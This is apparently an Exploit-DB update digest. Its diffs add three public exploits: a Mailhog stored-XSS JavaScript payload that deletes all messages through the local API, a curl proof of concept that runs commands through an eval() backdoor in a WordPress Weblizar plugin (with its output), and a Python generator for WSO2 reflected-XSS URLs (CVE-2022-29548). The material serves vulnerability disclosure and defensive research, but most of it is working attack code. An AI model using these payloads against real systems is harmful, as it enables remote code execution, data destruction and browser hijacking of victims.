DB: 2022-06-28

3 changes to exploits/shellcodes

WordPress Plugin Weblizar 8.9 - Backdoor
WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)
Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)

Author: Offensive Security

exploits/multiple/webapps/50971.txt

@@ -0,0 +1,97 @@
+# Exploit Title: Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)
+# Google Dork: https://www.shodan.io/search?query=mailhog ( > 3500)
+# Date: 06.18.2022
+# Exploit Author: Vulnz
+# Vendor Homepage: https://github.com/mailhog/MailHog
+# Software Link: https://github.com/mailhog/MailHog
+# Version: 1.0.1
+# Tested on: Windows,Linux,Docker
+# CVE : N/A
+
+Explanation:
+Malicious users have the ability to send API requests to localhost and this request will be executed without any additional checks. As long as CSRF exists and unrestricted API calls as well, XSS could lead any API calls including  email deletion, sending, reading or any other call.
+
+Steps to reproduce:
+   1.   Create malicious attachment with payloads stated below
+   2.   Attach malicious file to email with payload (XSS)
+   3.   Send email
+   4.   Wait for victim to open email
+   5.   Receive data, get control of victim browser using Beef framework, or manipulate with API data
+
+
+Proof of Concept:
+
+<script>
+
+var XMLHttpFactories = [
+
+function () {
+
+    return new XMLHttpRequest()
+
+},
+
+function () {
+
+    return new ActiveXObject("Msxml2.XMLHTTP")
+
+},
+
+function () {
+
+    return new ActiveXObject("Msxml3.XMLHTTP")
+
+},
+
+function () {
+
+    return new ActiveXObject("Microsoft.XMLHTTP")
+
+}
+
+];
+
+function createXMLHTTPObject() {
+
+    var xmlhttp = false;
+
+    for (var i=0;i<XMLHttpFactories.length;i++) {
+
+        try {
+
+            xmlhttp = XMLHttpFactories[i]();
+
+        }
+
+        catch (e) {
+
+            continue;
+
+        }
+
+        break;
+
+    }
+
+    return xmlhttp;
+
+}
+
+var xhr = createXMLHTTPObject();
+
+xhr.open("DELETE", "http://localhost:8025/api/v1/messages", true);
+
+xhr.onreadystatechange = function()
+
+{
+
+    if (xhr.readyState == 4)
+
+        alert("Request completed, with the following status code: " +
+xhr.status);
+
+}
+
+xhr.send("");
+
+</script>

exploits/php/webapps/50969.txt

@@ -0,0 +1,38 @@
+# Exploit Title: WordPress Plugin Weblizar 8.9 - Backdoor
+# Google Dork: 'wp-json/am-member/license'
+# Exploit Author: Sobhan Mahmoodi
+# Vendor Homepage: https://weblizar.com/plugins/school-management/
+# Version: 8.9
+# Tested on: windows/linux
+
+Vulnerable code:
+
+add_action( 'rest_api_init', function() {
+     register_rest_route(
+           'am-member', 'license',
+           array(
+                'methods' => WP_REST_Server::CREATABLE,
+                'callback' => function( $request ) {
+                                $args = $request->get_params();
+                                if ( isset( $args['blowfish'] ) && ! empty(
+$args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] )
+) {
+                                               eval( $args['blowf'] );
+                                }
+                      };
+                )
+      );
+} );
+
+
+If you look at the code, the user code checks the parameters and finally executes the Blowf argument with the eval function. The Eval function is to take a string of PHP commands and execute it.
+
+In order to be able to exploit this vulnerability, it is enough to send a request such as the following request that according to the above code, the part with If should be set blowfish and blowf arguments and not empty, and
+given that eval executes the blowf value , Our favorite command must also be in this argument.
+
+Proof of Concept:
+
+curl -s -d 'blowfish=1' -d "blowf=system('id');" '
+http://localhost:8888/wp-json/am-member/license'
+
+uid=33(www-data) gid=33(www-data) groups=33(www-data)

exploits/php/webapps/50970.py

@@ -0,0 +1,72 @@
+# Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)
+# Date: 21 Apr 2022
+# Exploit Author: cxosmo
+# Vendor Homepage: https://wso2.com
+# Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/)
+# Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0;
+    # API Manager Analytics 2.2.0, 2.5.0, and 2.6.0;
+    # API Microgateway 2.2.0;
+    # Data Analytics Server 3.2.0;
+    # Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0;
+    # IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0;
+    # Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0;
+    # Identity Server Analytics 5.5.0 and 5.6.0;
+    # WSO2 Micro Integrator 1.0.0.
+# Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)
+# CVE: CVE-2022-29548
+
+import argparse
+import logging
+import urllib.parse
+
+# Global variables
+VULNERABLE_ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode="
+DEFAULT_PAYLOAD = "alert(document.domain)"
+
+# Logging config
+logging.basicConfig(level=logging.INFO, format="")
+log = logging.getLogger()
+
+def generate_payload(url, custom_payload=False):
+    log.info(f"Generating payload for {url}...")
+    if custom_payload:
+        log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//")
+    else:
+        log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//")
+
+def clean_url_input(url):
+    if url.count("/") > 2:
+        return f"{url.split('/')[0]}//{url.split('/')[2]}"
+    else:
+        return url
+
+def check_payload(payload):
+    encoded_characters = ['"', '<', '>']
+    if any(character in payload for character in encoded_characters):
+        log.info(f"Unsupported character(s) (\", <, >) found in payload.")
+        return False
+    else:
+        return urllib.parse.quote(payload)
+
+if __name__ == "__main__":
+    # Parse command line
+    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
+    required_arguments = parser.add_argument_group('required arguments')
+    required_arguments.add_argument("-t", "--target",
+                        help="Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)",
+                        required="True", action="store")
+    parser.add_argument("-p", "--payload",
+                        help="Use custom JavaScript for generated payload (Some characters (\"<>) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))",
+                        action="store", default=False)
+    args = parser.parse_args()
+
+    # Clean user target input
+    args.target = clean_url_input(args.target.lower())
+
+    # Check for unsupported characters in custom payload; URL-encode as required
+    if args.payload:
+        args.payload = check_payload(args.payload)
+        if args.payload:
+            generate_payload(args.target, args.payload)
+    else:
+        generate_payload(args.target)

files_exploits.csv

@@ -45031,3 +45031,6 @@ id,file,description,date,author,type,platform,port
 50966,exploits/php/webapps/50966.txt,"Old Age Home Management System 1.0 - SQLi Authentication Bypass",1970-01-01,twseptian,webapps,php,
 50967,exploits/hardware/webapps/50967.txt,"SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)",1970-01-01,"Ahmed Alroky",webapps,hardware,
 50968,exploits/hardware/webapps/50968.txt,"SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)",1970-01-01,"Ahmed Alroky",webapps,hardware,
+50969,exploits/php/webapps/50969.txt,"WordPress Plugin Weblizar 8.9 - Backdoor",1970-01-01,"Sobhan Mahmoodi",webapps,php,
+50970,exploits/php/webapps/50970.py,"WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)",1970-01-01,cxosmo,webapps,php,
+50971,exploits/multiple/webapps/50971.txt,"Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)",1970-01-01,Vulnz,webapps,multiple,